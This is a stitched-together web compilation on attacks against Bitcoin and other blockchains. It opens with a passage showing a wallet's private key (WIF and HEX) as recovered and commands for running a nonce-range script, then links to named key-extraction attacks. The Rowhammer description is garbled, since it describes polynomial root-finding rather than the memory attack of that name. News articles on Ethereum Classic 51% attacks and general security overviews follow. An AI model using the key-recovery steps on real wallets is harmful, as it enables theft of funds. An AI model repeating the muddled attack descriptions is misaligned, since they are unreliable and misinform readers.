Checking the private key on the bitaddress website

Private key found!
https://www.blockchain.com/btc/address/15N1KY5ohztgCXtEe13BbGRk85x2FPgW8E

0.001 BTC

ADDR: 15N1KY5ohztgCXtEe13BbGRk85x2FPgW8E
WIF: 5JCAmNLXeSwi2SCgNH7wRL5qSQhPa7sZvj8eDwxisY5hJm8Uh92
HEX: 31AFD65CAD430D276E3360B1C762808D1D051154724B6FC15ED978FA9D06B1C1

RangeNonce

«RangeNonce» is a script to find the range of the secret key

https://cryptodeeptech.ru/kangaroo/

Let’s choose the version for the distribution kit GNU/Linux. Google Colab provides UBUNTU 18.04

RangeNonce

Upload all files to Google Colab

RangeNonce + Google Colab

Let’s allow permissions for the script and run the script «RangeNonce»

Commands:

    chmod +x RangeNonce
    ./RangeNonce
    cat Result.txt

Everything will be saved to a file: Result.txt

result.txt

This is the partial disclosure of bytes of information the value of “K” (NONCES)

So our secret key is in the range:

K = 070239c013e8f40c8c2a0e608ae15a6b00000000000000000000000000000000
K = 070239c013e8f40c8c2a0e608ae15a6bffffffffffffffffffffffffffffffff

This is a very serious ECDSA signature error

Frey-Rück Attack

With a critical vulnerability in the Bitcoin blockchain transaction, we can solve the rather difficult discrete logarithm problem to extract the ECDSA secret key “K” (NONCE) from the vulnerable signature in order to ultimately restore the Bitcoin Wallet, since knowing the secret key we can get the private key. To do this, there are several algorithms from the list of popular attacks on Bitcoin, one of which is “Frey-Rück Attack on Bitcoin”.

https://cryptodeeptech.ru/frey-ruck-attack/

Rowhammer Attack

The biggest cryptographic strength of the Bitcoin cryptocurrency is a computational method in discrete mathematics that takes the problem of factorization of large integers and the problem of hidden numbers (HNP) in the Bitcoin ECDSA signature transaction as a basis.
Rowhammer Attack on Bitcoin allows us to efficiently find all zeros for normalized polynomials modulo a certain value, and we adapt this method to a signature algorithm, ECDSA, more precisely, to critically vulnerable transactions in the Bitcoin blockchain. We will apply multiplication by different powers of the same element of the finite field, which, oddly enough, can coincide and give us a certain function over the finite field, which can be specified using the Lagrange interpolation polynomial.

https://cryptodeeptech.ru/rowhammer-attack/

WhiteBox Attack

Differential fault analysis (DFA) was briefly described in the literature in 1996 when an Israeli cryptographer and cryptanalyst Eli Biham and an Israeli scientist Adi Shamir showed that they could use error injection to extract the secret key and recover the private key using various signature and verification algorithms.

We implement the “WhiteBox Attack on Bitcoin” with the differential bugs described in this research paper. The classic DFA that we described in the previous article is called F(). Some of these attacks also require two ECDSA signature pairs.

https://cryptodeeptech.ru/whitebox-attack/

Attacks on Cold Wallets

Hardware wallets, or cold wallets, can also be hacked. For instance, researchers initiated an Evil Maid attack by exploiting bugs in the Nano S Ledger wallet. As a result of this hack, researchers obtained the private keys as well as the PINs, recovery seeds, and passphrases of victims.

One of the latest cold wallet attacks happened in 2019, when the UPbit cryptocurrency exchange was transferring funds to a cold wallet. This is a common way to freeze crypto when you’re expecting a cyberattack. The hackers managed to steal 342,000 ETH, apparently because they knew the timing of the transaction.

Attacks on Hot Wallets

Hot wallets are internet-connected apps for storing private cryptographic keys.
Though owners of cryptocurrency exchanges claim they keep their user data in wallets disconnected from the web, a $500 million attack on Coincheck in 2018 proved this isn’t always true. In June 2019, an attack on GateHub resulted in unauthorized access to dozens of native XRP wallets and the theft of crypto assets. Singapore-based crypto exchange Bitrue also experienced a hot wallet attack at almost the same time due to a system vulnerability. As a result, hackers managed to steal funds worth over $4.5 million in XRP and $237,500 in ADA.

Smart Contract Attacks

We’ve already accumulated rich experience in analyzing and avoiding vulnerabilities in smart contracts based on the Ethereum, EOS, and NEO platforms. The main blockchain security issues associated with smart contracts relate to bugs in source code, a network’s virtual machine, the runtime environment for smart contracts, and the blockchain itself. Let’s look at each of these attack vectors.

PDF: Smart Contract Vulnerability Detection Technique: A Survey

The Smart Contract examples used are issues that have occurred on the Ethereum blockchain. They are applicable to any platform that uses the Ethereum Virtual Machine and the concepts can be applied to any form of smart contracts. The topic will also cover known best practices to mitigate these issues. The Topology attacks explore possible attack vectors on the Bitcoin network, and subsequently any networks that rely on a controlled amount of peer-peer communication for validation. The issues explored will be on two levels: Vulnerable Smart Contract codes and Topology attacks.

Jorden Seet’s interest in the Cybersecurity world started in 2013 when he competed in his first CTF after a 2-day penetration testing bootcamp. Ever since, he has grown a passion in cybersecurity and explored many facets of it, from Cryptography to Social Engineering.
https://youtu.be/LInz2YaDhgQ

Currently, he is working on a National Research Foundation – Tel Aviv University (NRF-TAU) granted project on using Network Topology Analytics for Cyber Attack Deterrence in SMU. He was previously with the Cyber Security Agency of Singapore’s Penetration Testing department as an intern and is currently working with BlockConnectors on Smart Contract Audit and Blockchain development. In his spare time, he works on Smart Contract Hacking and explores potential blockchain attack vectors. He firmly believes that decentralization is a paradigm that could have real potential in revolutionizing the security industry, such as in DDoS prevention, Data integrity and IoT security.

Vulnerabilities in Contract Source Code

If a smart contract has vulnerabilities in its source code, it poses a risk to parties that sign the contract. For instance, bugs discovered in an Ethereum contract cost its owners $80 million in 2016. One of the common vulnerabilities in Solidity opens up a possibility to delegate control to untrusted functions from other smart contracts, known as a reentrancy attack. During this attack, contract A calls a function from contract B that has an undefined behavior. In turn, contract B can call a function from contract A and use it for malicious purposes.

Vulnerabilities in Virtual Machines

[Figure: Vulnerabilities in virtual machines]

The Ethereum Virtual Machine (EVM) is a distributed stack-based computer where all smart contracts of Ethereum-based blockchains are executed. The most common vulnerabilities of the EVM are the following:

Immutable defects — Blockchain blocks are immutable by nature, which means that once a smart contract is created, it can’t be changed. But if a smart contract contains any bugs in its code, they also are impossible to fix. There’s a risk that cybercriminals can discover and exploit code vulnerabilities to steal Ether or create a new fork, as happened with the DAO attack.
Cryptocurrency lost in transfer — This is possible if Ether is transferred to an orphaned address that doesn’t have any owner or contract.

Bugs in access control — There’s a missed modifier bug in Ethereum smart contracts that allows a hacker to get access to sensitive functionality in a contract.

Short address attack — This is possible because the EVM can accept incorrectly padded arguments. Hackers can exploit this vulnerability by sending specifically crafted addresses to potential victims. For instance, during a successful attack on the Coindash ICO in 2017, a modification to the Coindash Ethereum address made victims send their Ether to the hacker’s address.

Also, hackers can compromise smart contracts by applying other methods that are typical for compromising blockchain technology, including DDoS, eclipse, and various low-level attacks. However, younger blockchains such as Cardano and Zilliqa use different virtual machines: IELE, KEVM, and others. These new blockchains claim to guarantee smart contract security within their protocols.

Transaction Verification Mechanism Attacks

Unlike financial institutions, blockchains confirm transactions only after all nodes in the network are in agreement. Until a block with a transaction is verified, the transaction is classified as unverified. However, verification takes a certain amount of time, which creates a perfect vector for cyberattacks.

Double-spending is a common blockchain attack exploiting the transaction verification mechanism. All transactions on a blockchain need to be verified by users in order to be recognized as valid, which takes time. Attackers can use this delay to their advantage and trick the system into using the same coins or tokens in more than one transaction.

Figure 2. A double-spending attack

Here are the most common types of attacks based on exploiting the intermediate time between a transaction’s initiation and confirmation.
Finney Attacks

https://cryptodeep.ru/doc/Exploring_the_Attack_Surface_of_Blockchain.pdf

A Finney attack is possible when one transaction is premined into a block and an identical transaction is created before that premined block is released to the network, thereby invalidating the second identical transaction. The Finney attack can be termed as an extension of the selfish mining attack. The attacker mines a block stealthily and sends the unconfirmed transaction to the other node, possibly to a merchant node. If the merchant node accepts the transaction, then the attacker can further add a new block to the chain in a small-time frame, reversing that transaction and inducing a double spending attack. The attack window in the case of a Finney attack is considerably small, but this can cause a lot of damage if the value of the transaction is large enough.

Race Attacks

A race attack is executed when an attacker creates two conflicting transactions. The first transaction is sent to the victim, who accepts the payment (and sends a product, for instance) without waiting for confirmation of the transaction. At the same time, a conflicting transaction returning the same amount of cryptocurrency to the attacker is broadcast to the network, eventually making the first transaction invalid. In a race attack, the attacker does not pre-mine the transaction but simply broadcasts two different transactions, one of them to the merchant and one of them to the network. If the attacker is successful in giving the merchant node the illusion that the transaction received by them is the first one, then they accept it, and the attacker can broadcast a completely different transaction to the entire network.

Besides these core blockchain level attacks, there are a number of other attacks that can happen at the application implementation level. One of the most infamous of them was the DAO attack that happened in June 2016, leading to a theft of about $70 million.
The attacker contributed to the crowdfunding campaign of a company and requested a withdrawal. However, a recursive function was implemented for the withdrawal that didn’t check the settlement status of the current transaction. To recover the money, the Ethereum chain went into a hard fork, with the old chain continuing on as Ethereum Classic. This severely damaged the reputation of the chain, and the autonomy of the chain also came into question.

Some general measures to prevent these attacks from happening:

It should be ensured that there are no logical inconsistencies in the chain code and consensus algorithm.
The peers should be selected with sufficient complexity and caution, and the transactions should be reviewed regularly.
In case any suspicious activity is detected, the network should be vigilant enough to isolate the bad actor node immediately.
A proper review process should be deployed for the network for each new node when it joins the network.
Rate limiting algorithms should be present at all the relevant processes to limit the damage and prevent attacks as and when they happen.
2FA should be present at all the concerned authentication points, and it should be ensured that all the authentication level bugs should be fixed at the application level itself to the extent possible.

Most of the time, the approach of blacklisting and whitelisting does not work due to scalability issues. So, a better approach should be to make the attacks costly enough to be performed and increase the complexity of the system to be resilient enough and make successful exploitation extremely difficult.

Multiple other bugs and vulnerabilities exist in different kinds of the blockchain networks, the most common and concerning of them being at the smart contract level, but they are a topic for another time.

Vector76 Attacks

Vector76 is a combination of two previous attacks.
In this case, a malicious miner creates two nodes, one of which is connected only to the exchange node and the other of which is connected to well-connected peers in the blockchain network. After that, the miner creates two transactions, one high-value and one low-value. Then, the attacker premines and withholds a block with a high-value transaction from an exchange service. After a block announcement, the attacker quickly sends the premined block directly to the exchange service. It along with some miners will consider the premined block as the main chain and confirm this transaction. Thus, this attack exploits the fact that one part of the network sees the transaction the attacker has included into a block while the other part of the network doesn’t see this transaction.

After the exchange service confirms the high-value transaction, the attacker sends a low-value transaction to the main network, which finally rejects the high-value transaction. As a result, the attacker’s account is credited the amount of the high-value transaction. Though there’s a high chance for success with this type of attack, it’s not common because it requires a hosted e-wallet that accepts the payment after one confirmation and a node with an incoming transaction.

Alternative History Attacks

An alternative history attack — also called a blockchain reorganization attack — may happen even in the case of multiple confirmations but requires a huge amount of computing power from the hacker. In this case, a malicious user sends a transaction to a recipient and at the same time mines an alternative fork with another transaction that returns the same coins. Even if the recipient considers the transaction valid after n confirmations and sends a product, for instance, the recipient may lose money if the attacker releases a longer chain and gets the coins back.
One of the latest blockchain reorganization attacks happened to Ethereum Classic in August 2020 when a miner used old software and lost internet access for a while when mining. A reorganization happened when two versions of the blockchain competed for validity from nodes in the network and resulted in about a 3000-block insertion.

51% or Majority Attacks

A majority attack is possible when a hacker gets control of 51% of the network hash rate and creates an alternative fork that finally takes precedence over existing forks. This attack was initially the only known blockchain vulnerability and seemed unrealistic in the near past. However, at least five cryptocurrencies — Verge, ZenCash, Monacoin, Bitcoin Gold, and Litecoin Cash — have already suffered from 51% attacks. In each of these cases, cybercriminals collected enough hashing power to compromise the network and pocket millions of dollars.

The recent 51% attack on Ethereum Classic (ETC) that happened in August 2020 resulted in approximately $5.6 million worth of the ETC cryptocurrency being double-spent. Apparently, the hacker had good knowledge of the ETC protocol and managed to mine 4,280 blocks over four days until the platform noticed an attack. Just five days after the incident, ETC suffered from a second 51% attack, in which a miner conducted a 4,000-block network reorganization.

[Figure: Majority attack]

Unfortunately, all small cryptocurrencies are still at risk of majority attacks. Since these cryptocurrencies attract fewer miners, attackers can just rent computing power to gain a majority share of the network. The developers of Crypto51 have tried to draw attention to the potential risks of hacking smaller cryptocurrencies. Their website shows the expected costs of a 51% attack on various blockchains.
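The race attack described earlier works only if the recipient acts on a transaction before a conflicting one has had time to surface. The following added example, which is not part of the original page, models a recipient-side check: wait out a listening period, look for any other transaction spending the same outputs, and count only relays from peers the recipient connected to itself. The Relay record, peer labels, thresholds and sample data are all constructed assumptions.

```python
"""Added example: recipient-side screening of an unconfirmed payment."""
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List, Tuple


@dataclass(frozen=True)
class Relay:
    """One announcement of one transaction by one peer (constructed model)."""
    t: float                # seconds since the payment was first seen
    peer: str               # hypothetical peer / observer-node label
    inbound: bool           # True if the peer opened the connection to us
    txid: str
    spends: FrozenSet[str]  # outpoints consumed, written "prev_txid:index"


def evaluate_payment(relays: Iterable[Relay], payment_txid: str,
                     listen_seconds: float = 10.0,
                     min_outbound_peers: int = 2) -> Tuple[str, List[str]]:
    """Return (decision, conflicting_txids) for an unconfirmed payment.

    REJECT  - another transaction spends the same outputs (forward it on)
    HOLD    - no conflict seen, but too few independent peers relayed it
    PROCEED - no conflict during the listening period; confirmations
              still decide finality
    UNKNOWN - the payment was not observed at all
    """
    window = [r for r in relays if r.t <= listen_seconds]
    payment = [r for r in window if r.txid == payment_txid]
    if not payment:
        return "UNKNOWN", []
    spent = frozenset().union(*(r.spends for r in payment))
    conflicts = sorted({r.txid for r in window
                        if r.txid != payment_txid and r.spends & spent})
    if conflicts:
        return "REJECT", conflicts
    # A transaction pushed to us over an inbound connection proves nothing
    # about what the rest of the network saw, so inbound relays do not count.
    outbound = {r.peer for r in payment if not r.inbound}
    if len(outbound) < min_outbound_peers:
        return "HOLD", []
    return "PROCEED", []


UTXO = frozenset({"utxo_a:0"})  # constructed outpoint label

# Constructed scenario 1: payment arrives directly, a conflicting spend
# of the same output shows up via two observer nodes.
RACE = [
    Relay(0.0, "inbound-7", True, "tx_pay", UTXO),
    Relay(2.4, "observer-1", False, "tx_back", UTXO),
    Relay(2.9, "observer-2", False, "tx_back", UTXO),
]
# Constructed scenario 2: payment seen only over an inbound connection.
DIRECT_ONLY = [Relay(0.0, "inbound-7", True, "tx_pay", UTXO)]
# Constructed scenario 3: payment relayed by two independent outbound peers.
HONEST = [
    Relay(0.0, "observer-1", False, "tx_pay", UTXO),
    Relay(1.1, "observer-2", False, "tx_pay", UTXO),
]


def run_samples() -> dict:
    """Evaluate the three constructed scenarios."""
    return {name: evaluate_payment(data, "tx_pay")
            for name, data in (("race", RACE),
                               ("direct_only", DIRECT_ONLY),
                               ("honest", HONEST))}


if __name__ == "__main__":
    for name, (decision, conflicts) in run_samples().items():
        print(f"{name:12s} {decision:8s} conflicts={conflicts}")
```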
Possible measures for preventing double-spending attacks include monitoring received transactions during a listening period, forwarding double-spending attempts, inserting other nodes to observe transactions, and rejecting direct incoming connections.

Moreover, there’s an innovative technology called the lightning network that’s designed to solve the problem of exploiting weaknesses in the transaction verification mechanism. This network allows users to instantly verify transactions through a network of bidirectional payment channels without delegating custody of funds. However, it’s still susceptible to DDoS attacks, one of which already happened in March 2018.

A 51% attack happens when a particular miner or a set of miners gain more than 50% of the processing power of the entire blockchain network, which helps them gain a majority in regard to the consensus algorithm. This attack vector is primarily related to the Proof of Work algorithm, but it can be extended as a test case to other consensus algorithms also, where there is a risk of a single party gaining enough influence in the network to unduly modify the state of the chain. This can lead to multiple damages including rewriting the chain data, adding new blocks, and double spending. The following diagram shows how this attack happens.

In the above visual representation, the red nodes are controlled by the attacker, and they can change the copy of the chain by adding new blocks post gaining majority consensus.

Some of the major chains that have suffered a 51% attack are the Bitcoin Gold Blockchain (in May 2018, 388,000 BTG worth around $18 million were stolen from multiple exchanges), Bitcoin Satoshi’s Vision (in August 2021, they suffered a 51% attack after which the coin suffered a 5% loss in value) and the Ethereum Classic blockchain.

Rented Hash Power can also lead to 51% attacks.
In this method, the attackers can rent computing power on servers to calculate hashes faster than other participants and gain consensus. Mining pools are also an interesting party in this, since they too can sometimes exceed the consensus requirements. In July 2014, the mining pool ghash.io gained more than 50% processing power for a brief period, after which it committed to reducing its power voluntarily. The culprits behind the recent 51% attacks on Ethereum Classic used rented mining hash power to carry off their heists, exploiting a vulnerability common to cryptocurrencies that rely on “proof of work” as their underlying technology. Rented mining hash power is at the center of all three attacks on ETC last month, which resulted in millions of dollars in losses and delivered a significant blow to the reputation of PoW protocols previously believed to be immutable and “unhackable.” “It’s actually a huge vulnerability in the system,” said Terry Culver, CEO of ETC Labs, an incubator of projects on Ethereum Classic, in an interview with Forkast.News. “Three attacks in one month will tell you that security is an issue on Ethereum Classic. And we believe and know that other blockchains get attacked more regularly, maybe with less visibility,” Culver said. “It’s a universal problem.” The cryptocurrency space has been trying to weed out criminals and tighten up security, including the implementation of “know your customer” and anti-money laundering (KYC/AML) procedures, increased regulations from governments, and enhanced security systems to stave off hacking. But despite these efforts, malicious actors continue to exploit a core feature of many blockchain systems — decentralization and the requirement that there must be a 51% consensus of the protocol’s nodes to control the network. “The [cryptocurrency] system is maturing, but the hash rental market is actually growing,” Culver said. “Think of it like, you turn the light on, and where do the mice go? 
[Malicious actors have] left the exchanges for the most part, and they’ve moved into the hash rental market.”

Proponents of PoW systems would say that the 51% requirement needed to gain consensus would make it very hard to hack large blockchain protocols like Bitcoin and Ethereum. But there is still a theoretical possibility if someone or a group manages to gain 51% control over those networks.

The risk of a 51% attack increases for smaller cryptocurrencies that don’t have as many nodes, as it would be relatively easier to take over a smaller network while still turning a profit. For example, it would take over US$513,000 to perform a 51% attack (at the time of this publication) for one hour on Bitcoin, but only about US$3,800 for a similar attack on Ethereum Classic, which is why the smaller network may be much easier and more profitable for malicious actors to attack.

“The hash rental market is like under a rock somewhere, it’s totally anonymous,” Culver said. “They’re basically money laundering operations. So you could take your BTC from ill-gotten gains, rent hash power, and get out freshly-minted tokens with no provenance.”

[Figure: The cost of launching a 51% attack on various top cryptocurrencies through NiceHash. Image: Crypto51]

What does renting hashpower do? How did they do it?

The malicious actors behind the first two attacks on ETC in August were able to achieve 51% dominance over the network by renting hash power from NiceHash provider daggerhashimoto, based on an analysis by Bitquery, a data intelligence firm. Slovenia-based NiceHash is an online platform where customers can rent hashing power from sellers providing the computing power to mine cryptocurrencies.

By using this rented hash power, the attackers behind the first and second attacks on Ethereum Classic were able to “double spend” over US$7 million by overwriting entries in the blockchain, reversing or even changing the destination of transactions.
In other words, the attackers had almost complete control over the network and were able to route money as they pleased. NiceHash has previously been embroiled in controversy. In 2019, its former chief technology officer and co-founder Matjaz Skorjanec was arrested in Germany over U.S. charges of being involved in a hacking group that organized the theft of millions of dollars. NiceHash itself was hacked in 2017, resulting in the loss of an estimated US$78 million in bitcoin. The August hacks were not the first time Ethereum Classic suffered from such breaches, as a similar 51% attack occurred against ETC in January 2019. Hackers have also launched successful 51% attacks on a number of other smaller cryptocurrencies, including Bitcoin Gold, Verge and Monacoin in 2018. “Computers are getting better, it’s going to keep getting easier and easier to get control of the computer power necessary to do these things,” said Benjamin J. A. Sauter, partner at New York-based international law firm Kobre & Kim, which is representing ETC Labs in investigating and suing the hackers. Moreover, the concentration of hashing power in China has also been shown to be a risk for cryptocurrencies, as recent flooding in the country’s Sichuan province destroyed thousands of crypto miners. Sichuan province, which is known for its cheap hydropower, has been a popular location for cryptocurrency mining farms looking to save money, but the floods and landslides caused a distinct drop of BTC hashrate in Chinese mining pools. In a statement addressing the recent attacks and allegations from ETC Labs, NiceHash says that it “does not support or enable 51% attacks” but also concedes that its hash power “might be abused by the attacker’s pool.” NiceHash says it takes steps to prevent or help prevent market disruptions and manipulations, and cooperates with law enforcement conducting investigations on activities which break their terms of service and privacy policy. 
Forkast.News has reached out to NiceHash for additional comment, but has not received a response as of the time of writing.

Self regulation vs government intervention?

Despite the hacks and the numerous monetary losses, the crypto community have largely said they prefer to pursue malicious actors privately instead of bringing in greater government regulation and scrutiny. As a result of the attacks on Ethereum Classic, ETC Labs has announced that they are developing a strategic plan to protect the integrity of the ETC ecosystem. The plan includes cooperating with miners to maintain a consistent hash rate on the network, advanced monitoring to identify anomalies or spikes in the hashrate, and eventually changing the PoW mining algorithm.

“By and large, I think the space doesn’t want the government to become deeply involved in how the exchanges operate and try to remedy wrongs,” Sauter said. “I think the industry as a whole wants to be able to self-regulate and have an environment where the government doesn’t need to be in the weeds. But as long as there’s not an effective private resolution, it’s how problems are going to be solved.”

The cryptocurrency industry has seen increasing government interest, stricter rules and moves toward regulations in recent times, including the U.S.’ Financial Action Task Force’s guidelines for virtual asset service providers like exchanges to include the personal information of people transacting over US$1,000. Another U.S. agency, the Commodity Futures Trading Commission (CFTC) also announced a strategic plan to regulate cryptocurrencies by 2024. The U.S. Securities and Exchange Commission (SEC) may also be on track to shift its views on how it determines cryptocurrencies to be securities, according to SEC commissioner Hester Peirce.
“Capital markets can transform people’s lives, and so allowing the financial system to reach more people means that we have to really revisit some regulatory features that are in place now,” Peirce said in an interview with Forkast.News. “Crypto is an opportunity for us to be introspective and to say, hey, are we handling innovation right?” Rented hash power might be a new sector where the industry may prefer to resolve disputes privately before the government steps in, Sauter said. “If you don’t [have a framework for private dispute resolution], the only other choice that the victims of frauds have is to go to the government,” Sauter said, adding that those actions led to a wide crackdown on cryptocurrency business by the SEC and CFTC. “The industry would like for the government to take a hands-off approach, but that’s just not going to be a long-term, feasible solution if there’s also no way to figure out who is abusing the system.” To bring the cryptocurrency industry out of the Wild West of scams and hacks that proliferated during the ICO bubble of 2017 would require increasing controls and checks on the system — through government or private organizations. “If there’s a market for renting, I don’t think that itself is a problem,” Sauter said. “But if you’re doing it without keeping track of who your customers are and doing the same kind of due diligence that the exchanges are doing now, so that you’re able to trace back these kinds of frauds and hold people accountable when they abuse it, then you’re part of the problem, not the solution.” NiceHash begs to differ. “Just like ISPs can’t guarantee that all internet traffic is not malicious, NiceHash cannot be responsible for the security of every blockchain infrastructure,” the hash power provider said, in a statement. “The question of security becomes the question of the community and its creators. 
We must accept that if we want a true decentralization.” Ethereum Classic was besieged in August with three separate instances of 51% attacks that resulted in the disruption of over 10,000 blocks and millions of dollars in losses. “Increasing frustration is definitely the best way to describe it,” said Terry Culver, CEO of ETC Labs, an incubator of projects on Ethereum Classic. Although ETC Labs and other developers are working on ways to protect the blockchain network from further 51% attacks, security concerns regarding transactions have put in question the utility of blockchain networks based on proof of work (PoW), the consensus mechanism used in more cryptocurrencies than any other. “It’s a vulnerability that all proof-of-work blockchains have, even Bitcoin and Ethereum,” said Culver, in an interview with Forkast.News. “We think that they’re secure because of the cost to attack those networks, but the truth is that cost is subjective.” The first of the recent wave of Ethereum Classic’s 51% attacks occurred in early August, when an estimated US$5.6 million of ETC was double-spent — made possible because rented hashpower allowed the individuals to achieve majority control over the network. “The cost to attack one of those networks for a state actor, or even a non-state actor, is trivial,” Culver said. “And in fact, I think those attacks will come.” According to Benjamin J. A. Sauter, partner at New York-based international law firm Kobre & Kim, the attacks were not the result of a technical issue with the ETC blockchain, as reported by other publications, but rather the result of a person or group acting maliciously to commit fraud. “What we want to do is send a message to them: that you’re not going to get away with this, we’re not going to take it sitting down, and we are going to try to figure out who you are,” Sauter said. Culver adds: “And what we are doing now and what we have to continue to do is find ways to make it more secure. 
For us, it’s not a question of abandoning proof of work; it’s a question of innovating so that we can prevent malicious activity and grow the kind of ecosystem we’re trying to grow.”

Watch Culver and Sauter’s full interview with Forkast.News Editor-in-Chief Angie Lau explaining the repeated Ethereum Classic 51% hacks, what these breaches mean for larger PoW blockchains like Bitcoin and Ethereum, whether ‘proof of stake’ networks offer a superior alternative, and more.

Angie Lau: Welcome to Word on the Block, the series that takes a deeper dive into the blockchain and emerging technology stories that shape our world at the intersection of business, politics and economy. I’m Forkast.News Editor-in-Chief Angie Lau. Well, once upon a time, ‘proof of work’ was actually what made the blockchain world go round, as a consensus mechanism made popular by Satoshi Nakamoto’s Bitcoin. Developers have been increasingly concerned about the 51% attack, the proof of work, the silver bullet. Really in the early days, it was theoretical, a hypothetical. Well, in the span of just a couple of months, an attacker has gained more than 50% control of the network’s hash rate, and it has prevented other miners from completing blocks. We’ve seen not one, not two, but three attacks — 51% attacks — on one network, and it’s Ethereum Classic. And so the question is, is this the end of proof of work? What is happening with Ethereum Classic?

Highlights

Could Ethereum Classic get 51%-hacked again? “Three attacks in one month will tell you that security is an issue on Ethereum Classic. And we believe and know that other blockchains get attacked more regularly, maybe with less visibility. It’s a universal problem.”

The nature of proof-of-work blockchains: “We think that they’re secure because of the cost to attack those networks, but the truth is that cost is subjective.
The cost to attack one of those networks for a state actor, or even a non-state actor, is trivial.”

What allowed these attacks to happen: “So there’s two problems here: one is gaining 51% of the hash power on the network, which allows you to create your own transactions. The other is exchanges, where if their security protocols are not strong enough, an attacker can deposit and withdraw funds very quickly, before the exchange can respond to it.”

Despite these losses, the industry still has strong desire for self-regulation: “By and large, I think the space doesn’t want the government to become deeply involved in how the exchanges operate and try to remedy wrongs. I think the industry as a whole wants to be able to self-regulate and have an environment where the government doesn’t need to be in the weeds.”

Is it time to move away from proof of work, toward proof of stake? “For us, it’s not a question of abandoning proof of work; it’s a question of innovating so that we can prevent malicious activity and grow the kind of ecosystem we’re trying to grow.”

Mining Pool Attacks

For major cryptocurrencies like Bitcoin, it has become impossible for individual miners to earn a profit, so miners unite their computing power by creating mining pools. This allows them to mine more blocks and each receive a share of the reward. Currently, the largest Bitcoin mining pools are BTC.com, AntPool, and ViaBTC. Together, they represent more than 52 percent of the total hash rate of the Bitcoin network according to Blockchain.com.

Mining pools represent a sweet target. Malicious miners try to get control over mining pools both internally and externally by exploiting common web application vulnerabilities in the blockchain consensus mechanism.
[Figure: Mining pool attacks]

Selfish Mining Attack

Selfish mining refers to the attempts of malicious miners to increase their share of the reward by not broadcasting mined blocks to the network for some time and then releasing several blocks at once, making other miners lose their blocks. Possible measures for preventing this type of attack are random assignment of miners to various branches of pools, preferring the block with a more recent timestamp, and generating blocks within a maximum acceptable time. This type of attack is also known as block withholding.

[Figure: Selfish mining attack]

As a result of a selfish mining attack on the Eligius pool in 2014, miners lost 300 BTC. Selfish mining has high chances of success and may happen with all cryptocurrencies. Possible preventive measures against selfish mining include registering only trusted miners and making changes to the existing Bitcoin protocol to hide the difference between a partial proof of work and full proof of work.

This attack occurs when an attacker is able to mine blocks stealthily and create a copy of the chain that is longer than the common chain being worked upon by the other nodes. The attacker mines some blocks and does not broadcast them to the entire network. They keep mining and then publish a private fork once they are sufficiently ahead of the network in terms of the length of the chain. Since the network will shift to the chain that has been most worked upon (aka the longest chain rule), the attacker’s chain becomes the accepted one.

With the help of a selfish mining attack, the attacker can publish some transactions on the public network and then reverse them with the help of stealthily mined blocks.

PDF: Security Problem Definition and Security Objectives of Cryptocurrency Wallets

Fork after withholding

Fork after withholding (FAW) is a variation of selfish mining that turns out to be more rewarding for attackers.
During an FAW attack, the malicious miner hides a winning block and either discards it or releases it later to create a fork, depending on the situation. The concept of this attack was explicitly described by a group of researchers led by Ujin Kwon. First of all, you have the core concept of how a blockchain system functions. It is, literally, a chain of “blocks”, where each block is a piece of data that has been cryptographically hashed. Each block of data is a piece of information. In currencies, as a common and elementary example, each block is a transaction. When a user wants to make a transaction, their information is checked against the entire blockchain, to verify that the user indeed has currency available to spend. Once verified, their transaction is sent to miners, who compete to hash the data appropriately and add it to the chain. In manufacturing, blockchain technology may be used to secure sensitive files. If an attacker attempts to intercept those files and manipulate them, the blockchain fingerprint will be missing and those files will be rejected by the blockchain. That cryptography is one part of the equation of security. The cryptography used in a blockchain may vary, but modern cryptography is generally quite difficult to crack without compromising the keys. When learning about blockchain technology, you’ll learn all about how cryptography functions and its purpose. Additionally, the blockchain itself is a stored ledger of all of the data hashed into it. It’s a perfect, immutable transaction history that covers everything from the first action to the most recent action. More importantly, this ledger is not stored in one central location. Instead, it’s distributed between everyone who uses the technology. No one can manipulate this ledger, because they would need to manipulate every instance of it to make them match. This is the consensus protocol. 
Different blockchain technologies work in different ways specifically, but they all share core elements relating to consensus and the chain of blocks, where each individual block contains information about itself and the previous block, continuing a chain indefinitely.

While security seems immutable, humans are clever creatures, and there have already been a variety of different attacks on blockchain technologies, both actual and theoretical. Blockchain technology is relatively new and complex, and that means there are a lot of people looking at a lot of different angles to figure out how to compromise it. Wherever there’s a potential profit motivation, there will be malicious actors. Indeed, blockchain tech has a lot of potential and actual vulnerabilities that you will need to be aware of if you’re interested in modern cybersecurity.

Blockchain Technology Requires Proper Implementation of High-Quality Cryptography

Using high-end cryptographic processes to encode and hash data into a blockchain is great – if they’re implemented properly. It’s easy to treat these technologies as puzzle pieces that fit together, but using them in the wrong way can leave holes that can be exploited. Cracking the cryptography directly may be rare, but cracking the way it’s put together is a lot easier. Not to mention the possibility of backdoors in the encryption allowing unsavory access.

Blockchain Technology Interfaces with Less Secure Technology

Blockchain technology itself might be securely designed, but it has to interface with other technology to be useful, and that point of contact can be exploited. There have been dozens of small and large-scale attacks on blockchain systems. Though blockchain extends well beyond cryptocurrency, coin exchanges have been major targets of sophisticated attacks. Attackers don’t have to necessarily compromise the protocol itself when they can simply hack an exchange that has failed to take proper security measures on their servers.
Looking for these vulnerabilities can be a golden opportunity for malicious actors, but it’s also proven to be lucrative for white hat hackers who chase bugs for bounties. These bug hunters have identified dozens of problems with various blockchain platforms. One such attack targeted the “smart contract” system used by several digital currencies. In particular, it targeted Ethereum’s blockchain via the exchange Coincheck in Japan. The attack stole around 80 million dollars worth of ether from the exchange.

Blockchain’s Permanence for Currencies

Blockchain currency benefits are detriments as well. We’ve all read stories of people losing access to hugely valuable digital wallets: what was pocket change years ago became millions and was lost. The anonymity and security of the currency are both seen as a benefit, but for those who find themselves unable to recover a lost wallet, it’s a painful reminder that the technology requires security on both sides of the digital coin.

This is also an issue with the inability to insure or refund a transaction. With traditional currency, if some money is stolen from a bank account, a charge-back can rectify the situation and the insured bank takes the hit and is reimbursed. With something like cryptocurrency, if your currency is stolen from a wallet, it’s gone. The transaction cannot be reversed and is not insured.

In some cases, this can be rectified with something called a Hard Fork. A hard fork is a forced update to the entire blockchain that “forks” the chain before the theft, rewriting history to look like the theft never happened. The fork where it happened is abandoned, and the new fork becomes reality. Of course, this has its own set of problems; it requires a return to a central authority that can make such decisions, which is then open to further vulnerability. Now, perhaps future iterations of a digital blockchain currency will integrate solutions to this problem, and perhaps that will make other attack vectors appear.
The ever-evolving world of blockchain security is what you’ll learn when you study the subject.

Consensus Protocols

